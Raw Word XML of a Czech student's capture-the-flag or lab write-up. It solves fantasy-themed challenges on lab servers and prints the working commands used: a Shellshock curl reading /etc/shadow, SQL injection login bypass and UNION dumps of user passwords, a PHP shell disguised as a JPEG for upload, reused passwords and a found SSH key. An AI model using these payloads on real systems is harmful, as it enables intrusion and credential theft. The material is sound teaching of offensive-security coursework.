          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:t xml:space="preserve">, ty ale nebyli úspěšné. Místo cat jsem </w:t>
      </w:r>
      <w:r w:rsidR="00DA1F83" w:rsidRPr="00013512">
        <w:t>používál</w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127BED4D" w14:textId="04D5CC3C" w:rsidR="00737915" w:rsidRPr="00013512" w:rsidRDefault="00DA1F83" w:rsidP="00776D4A">
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>while read line; do echo \$line; done &lt; „cesta k souboru/soubor“</w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:t>,  který už fungoval. Zkoušel jsem ho na citlivé soubory a eventuálně jsem narazil na /etc/shadow, kde bylo tajemství A</w:t>
      </w:r>
      <w:r w:rsidR="00811192">
        <w:t>. Také to odpovídá nápovědě z tajemství „</w:t>
      </w:r>
      <w:r w:rsidR="00811192" w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>deep down in the shadow of the Iron Fortress</w:t>
      </w:r>
      <w:r w:rsidR="00811192">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008263FC" w:rsidRPr="00013512">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709855E0" w14:textId="3B1C3C3A" w:rsidR="008263FC" w:rsidRPr="00013512" w:rsidRDefault="00721B5B" w:rsidP="00776D4A">
      <w:r w:rsidRPr="00013512">
        <w:t>Příkaz na získání tajemství</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A664BC" w14:textId="1BB4817E" w:rsidR="006352AF" w:rsidRPr="00013512" w:rsidRDefault="005719D7" w:rsidP="0082559F">
      <w:pPr>
        <w:pStyle w:val="typewrite"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>curl http://10.89.1.157/cgi-bin/gate -H "User-Agent: () { :; };  echo; while read line; do echo \$line; done &lt; /etc/shadow"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173406F" w14:textId="77777777" w:rsidR="006352AF" w:rsidRPr="00013512" w:rsidRDefault="006352AF" w:rsidP="0018607D">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22826D" w14:textId="363C4550" w:rsidR="00E8478D" w:rsidRPr="00D9392D" w:rsidRDefault="006352AF" w:rsidP="003340BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>King of Edoras holds secret B hidden to everyone.</w:t>
      </w:r>
      <w:r w:rsidR="00B30118" w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>He keeps the secret in his private space where only him can access it.</w:t>
      </w:r>
      <w:r w:rsidR="00730567" w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Not even his very close elven friend - admin, who shares many secrets with the king - cannot access it. However, while the king keeps an eye on his secret, he may overlook access restrictions to some other important files. Find out how to control his friend - admin - and search some other interesting files to find out, how to bypass the king's guards. Perhaps, you should start gathering other information about his friend somewhere else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C78540" w14:textId="29D324A3" w:rsidR="00E8478D" w:rsidRPr="00013512" w:rsidRDefault="00E8478D" w:rsidP="00A24543">
      <w:r w:rsidRPr="00013512">
        <w:t>Pravděpodobně se jedná o tajemství na serveru 10.89.1.158</w:t>
      </w:r>
      <w:r w:rsidR="00995548" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> se službou ftp na portu 21</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">. Lze se na něj připojit pomocí </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r w:rsidR="00EB0F0F" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>10.89.1.158 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00995548" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Pomocí </w:t>
      </w:r>
      <w:r w:rsidR="00995548" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>nmap 10.89.1.158 21 -A</w:t>
      </w:r>
      <w:r w:rsidR="00995548" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> jsem zjistil, že verze serveru je </w:t>
      </w:r>
      <w:r w:rsidR="00995548" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>vsftpd 2.0.8 or later</w:t>
      </w:r>
      <w:r w:rsidR="00A24543" w:rsidRPr="00A24543">
        <w:t>, což jsem ale nijak nevyužil</w:t>
      </w:r>
      <w:r w:rsidR="00995548" w:rsidRPr="00013512">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7B7219" w14:textId="0D968EBB" w:rsidR="00B776D8" w:rsidRPr="00013512" w:rsidRDefault="00B776D8" w:rsidP="006352AF">
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">Díky řešení tajemství D, jsem našel přihlašovací údaje </w:t>
      </w:r>
      <w:r w:rsidR="00BC7A01" w:rsidRPr="00013512">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>dmin iloveyou.</w:t>
      </w:r>
      <w:r w:rsidR="008956A1" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Vytvořil jsem si na svém stroji SOCKS5 připojení přes user@bis.fit.vvutbr.cz na FTP server a začal jsem si prohlížet soubory</w:t>
      </w:r>
      <w:r w:rsidR="00515F52" w:rsidRPr="00013512">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00445C19" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Po delším hledání jsem zjistil, že v /etc/shadow mají admin a theoden stejný hash hesla</w:t>
      </w:r>
      <w:r w:rsidR="00E02AA4" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> (což sedělo s nápovědou v popisu tajemství)</w:t>
      </w:r>
      <w:r w:rsidR="00445C19" w:rsidRPr="00013512">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003340BC" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Po vyzkoušení stejného hesla „iloveyou“ jako uživatel „theoden“ jsem v jeho domácí složce našel soubor secret.txt, který obsahoval tajemství B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD21AD7" w14:textId="77777777" w:rsidR="006352AF" w:rsidRPr="00013512" w:rsidRDefault="006352AF" w:rsidP="0018607D">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA9F18" w14:textId="531FF239" w:rsidR="006352AF" w:rsidRPr="00D9392D" w:rsidRDefault="006352AF" w:rsidP="006352AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Secret C is easily retrieved from lousy workers at the elven kingdom. They barely check the outside of the incoming packages, let alone the insides. All they do is check the outsides and look on the lable, which describes the insides. Snuck a fake, possibly malicious package - a php script-like payload - through the input checkers and the secret is yours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B70096" w14:textId="77777777" w:rsidR="003D58FA" w:rsidRPr="00013512" w:rsidRDefault="003D58FA" w:rsidP="003D58FA">
      <w:r w:rsidRPr="00013512">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Jedná se o tajemství na serveru 10.89.1.159. Pomocí příkazu curl jsem si stáhl obsah http stránky. Je možné se odkázat na authentication.html, který obsahuje formu s jménem a heslem, a upload.html, který má formu pro uložení souboru. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B90D4E" w14:textId="17D7EB8F" w:rsidR="003D58FA" w:rsidRPr="00013512" w:rsidRDefault="003D58FA" w:rsidP="003D58FA">
      <w:r w:rsidRPr="00013512">
        <w:t>Zkoušel jsem uložit nějaký soubor na upload.php. Zjistil jsem ale, že požaduje MIME typ image. Je tedy potřeba php skript „obalit“ headrem, aby se tvářil jako obrázek. Toho jsem docílil pomocí skriptu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486EFAD" w14:textId="031742B8" w:rsidR="006151B4" w:rsidRPr="00013512" w:rsidRDefault="006151B4" w:rsidP="006151B4">
      <w:pPr>
        <w:pStyle w:val="typewrite"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>#!/bin/sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:br/>
        <w:t>echo -ne '\xFF\xD8\xFF\xE0' &gt; shell.jpeg.php # JPEG header</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:br/>
        <w:t>cat shell.php &gt;&gt; shell.jpeg.php              # Append PHP shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5866A38A" w14:textId="6021FF73" w:rsidR="007A7AFC" w:rsidRPr="00013512" w:rsidRDefault="007A7AFC" w:rsidP="00FB2B66">
      <w:r w:rsidRPr="00013512">
        <w:t>Který obalí soubor shell.</w:t>
      </w:r>
      <w:r w:rsidR="00FB2B66" w:rsidRPr="00013512">
        <w:t>php (který neměl nijak zajímavý kód)</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> a uloží ho jako shell.jp</w:t>
      </w:r>
      <w:r w:rsidR="00FB2B66" w:rsidRPr="00013512">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00FB2B66" w:rsidRPr="00013512">
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>. Tento soubor se mi už povedlo nahrát</w:t>
      </w:r>
      <w:r w:rsidR="000822CD" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> příkazem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382619E7" w14:textId="500D3035" w:rsidR="000822CD" w:rsidRPr="00013512" w:rsidRDefault="00576ED1" w:rsidP="000822CD">
      <w:pPr>
        <w:pStyle w:val="typewrite"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">curl  -X POST -F "file=@shell.jpeg.php" http://10.89.1.159/upload.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100E3ECD" w14:textId="63E192CC" w:rsidR="000822CD" w:rsidRPr="00013512" w:rsidRDefault="00BF523A" w:rsidP="000822CD">
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">Potom mi server </w:t>
      </w:r>
      <w:r w:rsidR="00F549B2" w:rsidRPr="00013512">
        <w:t>odpověděl</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> tajemství</w:t>
      </w:r>
      <w:r w:rsidR="00F549B2" w:rsidRPr="00013512">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637607C6" w14:textId="77777777" w:rsidR="006352AF" w:rsidRPr="00013512" w:rsidRDefault="006352AF" w:rsidP="00853667">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
        <w:ind w:left="1418" w:hanging="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40DE8F" w14:textId="650D3A04" w:rsidR="006352AF" w:rsidRPr="00D9392D" w:rsidRDefault="006352AF" w:rsidP="006352AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The dark forest is a place of many webs and bugs, some of them hardly visible. Those who can not find their way should verify themselves to the forest and the way shall be pointed to them. Once you arrive to the right place, perhaps ask not only about items, but about the contents of the previous verification too. Some </w:t>
      </w:r>
      <w:r w:rsidR="0018607D" w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>say</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> the best way to approach this task is through union.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ACCDEE" w14:textId="063E1523" w:rsidR="00794CD0" w:rsidRPr="00013512" w:rsidRDefault="00794CD0" w:rsidP="006352AF">
      <w:r w:rsidRPr="00013512">
        <w:t>Jedná se o tajemství na serveru 10.89.1.159. Pomocí příkazu curl jsem si stáhl obsah http stránky.</w:t>
      </w:r>
      <w:r w:rsidR="00EE0720" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Je možné se odkázat na authentication.html, který obsahuje formu s jménem a heslem, a upload.html, který má formu pro uložení souboru. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0755C550" w14:textId="3034C1FF" w:rsidR="00BB179D" w:rsidRPr="00013512" w:rsidRDefault="00BB179D" w:rsidP="00BB179D">
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">Z authentication.html je vidět, že při POST je volán skript authenticate.php. Zkusil jsem na něj jednoduchý SQL injection </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i -X POST http://10.89.1.159/authenticate.php -d "username=' OR 1=1 --&amp;password=any" </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">pro přeskočení autentizace, který fungoval. Příkaz se potom odkazoval na </w:t>
      </w:r>
      <w:r w:rsidR="00761D04" w:rsidRPr="00013512">
        <w:t>list.php?id=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">, který po jeho volání příkazem </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> vypsal list několika elfských věcí jménem Woodelf Items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18696717" w14:textId="66787635" w:rsidR="003863DE" w:rsidRPr="00013512" w:rsidRDefault="00EC044D" w:rsidP="00BB179D">
      <w:r w:rsidRPr="00013512">
        <w:t>V popisu tajemství je zmíněn union, čímž je pravděpodobně myšlen SQL UNION. Ten kombinuje dva nebo více SELECTů do jednoho výsledku</w:t>
      </w:r>
      <w:r w:rsidR="003863DE" w:rsidRPr="00013512">
        <w:t>, přičemž musí mít stejný počet sloupců. Z formátu dotazu na items je zřejmé, že je dotazováno na 3 sloupce, a to id, name a category. Udělal jsem teda UNION s tabulkou uživatelů. Je potřeba doplnit jeden „dummy“ sloupec</w:t>
      </w:r>
      <w:r w:rsidR="002645A8" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> a použít GET dotaz</w:t>
      </w:r>
      <w:r w:rsidR="003863DE" w:rsidRPr="00013512">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7780D7B9" w14:textId="7F31864C" w:rsidR="002645A8" w:rsidRPr="00013512" w:rsidRDefault="002645A8" w:rsidP="002645A8">
      <w:pPr>
        <w:pStyle w:val="typewrite"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>curl http://10.89.1.159/list.php?id=0%20UNION%20SELECT%20username,password,1%20FROM%20users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D740C5" w14:textId="69C3EAA2" w:rsidR="002645A8" w:rsidRPr="00013512" w:rsidRDefault="002645A8" w:rsidP="002645A8">
      <w:r w:rsidRPr="00013512">
        <w:t>Tím je na konci výsledku tajemství D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774485D1" w14:textId="069EEFD2" w:rsidR="005B7B70" w:rsidRPr="00013512" w:rsidRDefault="005B7B70" w:rsidP="002645A8">
      <w:r w:rsidRPr="00013512">
        <w:t>Také jsem zjistil zajímavý záznam, který jsem využil v tajemství B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A67411F" w14:textId="39BC35F7" w:rsidR="00794CD0" w:rsidRPr="00013512" w:rsidRDefault="005B7B70" w:rsidP="006352AF">
      <w:r w:rsidRPr="00013512">
        <w:t>{"0":"admin","id":"admin","1":"iloveyou","name":"iloveyou","2":1,"category":1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6D4E9" w14:textId="77777777" w:rsidR="006352AF" w:rsidRPr="00013512" w:rsidRDefault="006352AF" w:rsidP="0018607D">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:t>E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260565C2" w14:textId="77777777" w:rsidR="00D51115" w:rsidRPr="00D9392D" w:rsidRDefault="006352AF" w:rsidP="006352AF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9392D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>On thing is for sure - you are always welcome here in the house of Elrond. Your old friend said, that he has an interesting artefact. A chest with a damaged lid - to a common bystander, this chest looks like a junk. But Elrond is very persistent - he knows that the chest hides something.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F970136" w14:textId="77777777" w:rsidR="00D51115" w:rsidRPr="00013512" w:rsidRDefault="00D51115" w:rsidP="006352AF">
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">V domácí složce uživatele jsem našel .ssh, v které jsem následně našel privátní ssh klíč a configuraci pro ssh připojení uživatele elrond využívající tento klíč. Chybělo ale nastavení HostName. Jelikož </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:lastRenderedPageBreak/>
        <w:t>v době mého řešení už nebyli dostupné hostname jednotlivých serverů, zkusil jsem se připojit na servery podporující ssh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0315EC77" w14:textId="77777777" w:rsidR="00D5012C" w:rsidRPr="00013512" w:rsidRDefault="00D51115" w:rsidP="00D5012C">
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">Příkazem </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i ~/.ssh/id_rsa elrond@10.89.1.156, </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>jsem se připojil k</w:t>
      </w:r>
      <w:r w:rsidR="00E35FC7" w:rsidRPr="00013512">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>servru</w:t>
      </w:r>
      <w:r w:rsidR="00E35FC7" w:rsidRPr="00013512">
        <w:t xml:space="preserve">. Zkusil jsem pomocí příkazu </w:t>
      </w:r>
      <w:r w:rsidR="00E35FC7" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r w:rsidR="00E35FC7" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> zjistit jméno serveru, ale výsledek </w:t>
      </w:r>
      <w:r w:rsidR="00E35FC7" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>a873d388b394</w:t>
      </w:r>
      <w:r w:rsidR="00E35FC7" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> nebyl moc nápomocný</w:t>
      </w:r>
      <w:r w:rsidR="00F54EE6" w:rsidRPr="00013512">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D4D27" w14:textId="3B1636F7" w:rsidR="00A842EC" w:rsidRPr="00013512" w:rsidRDefault="00D5012C" w:rsidP="00B43D04">
      <w:r w:rsidRPr="00013512">
        <w:t>V </w:t>
      </w:r>
      <w:r w:rsidR="007D5120" w:rsidRPr="00013512">
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidR="007D5120" w:rsidRPr="00013512">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> složce elronda nebylo nic zajímavého, ale </w:t>
      </w:r>
      <w:r w:rsidR="006C03B0" w:rsidRPr="00013512">
        <w:t>v „</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="006C03B0" w:rsidRPr="00013512">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> byla složka </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>shrine</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0058475B">
        <w:t xml:space="preserve"> jejímž majitelem byl elrond a</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> ve které byly soubory </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>chest.img</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>binary_outpu.bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00013512">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DD0707" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Pomocí nástroje </w:t>
      </w:r>
      <w:r w:rsidR="00DD0707" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>binwalk</w:t>
      </w:r>
      <w:r w:rsidR="00DD0707" w:rsidRPr="00013512">
        <w:t>, jsem zjistil že se v chest.img nachází</w:t>
      </w:r>
      <w:r w:rsidR="00FA1774" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> zip</w:t>
      </w:r>
      <w:r w:rsidR="00DD0707" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD0707" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>scroll.xml</w:t>
      </w:r>
      <w:r w:rsidR="00DD0707" w:rsidRPr="00013512">
        <w:t>. Pro přístup k němu je potřeba heslo.</w:t>
      </w:r>
      <w:r w:rsidR="00A842EC" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Zjistil jsem, že zip se ve chest.img nachází s offsetem 41943040. Pomocí </w:t>
      </w:r>
      <w:r w:rsidR="00A842EC" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>dd</w:t>
      </w:r>
      <w:r w:rsidR="00A842EC" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> jsem si ho extrahoval</w:t>
      </w:r>
      <w:r w:rsidR="006C48DE" w:rsidRPr="00013512">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B43D04" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> Jelikož mi toto zůstalo jako poslední tajemství, použil jsem known plain-text attack s xml hlavičkou </w:t>
      </w:r>
      <w:r w:rsidR="00B43D04" w:rsidRPr="00013512">
        <w:rPr>
          <w:rStyle w:val="typewriteChar"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B43D04" w:rsidRPr="00013512">
        <w:t>. Pomocí nástroje bkcrack jsem potom do minuty zjistil 3 možné klíče a jemi jsem si odemkl zip, opět nástrojem bkcrack. V scroll.xml již pak bylo</w:t>
      </w:r>
      <w:r w:rsidR="00B3410E" w:rsidRPr="00013512">
        <w:t xml:space="preserve"> tajemství E</w:t>
      </w:r>
      <w:r w:rsidR="00B43D04" w:rsidRPr="00013512">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A842EC" w:rsidRPr="0001351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76457" w14:textId="77777777" w:rsidR="007D65ED" w:rsidRPr="00013512" w:rsidRDefault="007D65ED" w:rsidP="007E71DA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="05B43610" w14:textId="77777777" w:rsidR="007D65ED" w:rsidRPr="00013512" w:rsidRDefault="007D65ED" w:rsidP="007E71DA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000135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656540"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="2C3DF895" w14:textId="459B3356" w:rsidR="007E71DA" w:rsidRPr="00013512" w:rsidRDefault="007E71DA">
        <w:pPr>
          <w:pStyle w:val="Zpat"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r w:rsidRPr="00013512">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00013512">
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r w:rsidRPr="00013512">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00013512">
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00013512">
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="6EF8C086" w14:textId="77777777" w:rsidR="007E71DA" w:rsidRPr="00013512" w:rsidRDefault="007E71D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8D57A" w14:textId="77777777" w:rsidR="007D65ED" w:rsidRPr="00013512" w:rsidRDefault="007D65ED" w:rsidP="007E71DA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00013512">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4E0095C9" w14:textId="77777777" w:rsidR="007D65ED" w:rsidRPr="00013512" w:rsidRDefault="007D65ED" w:rsidP="007E71DA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000135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16CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F94099A4"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="149710FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A7C7DCE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:pStyle w:val="Nadpis1"/>
      <w:lvlText w:val="%1."/>
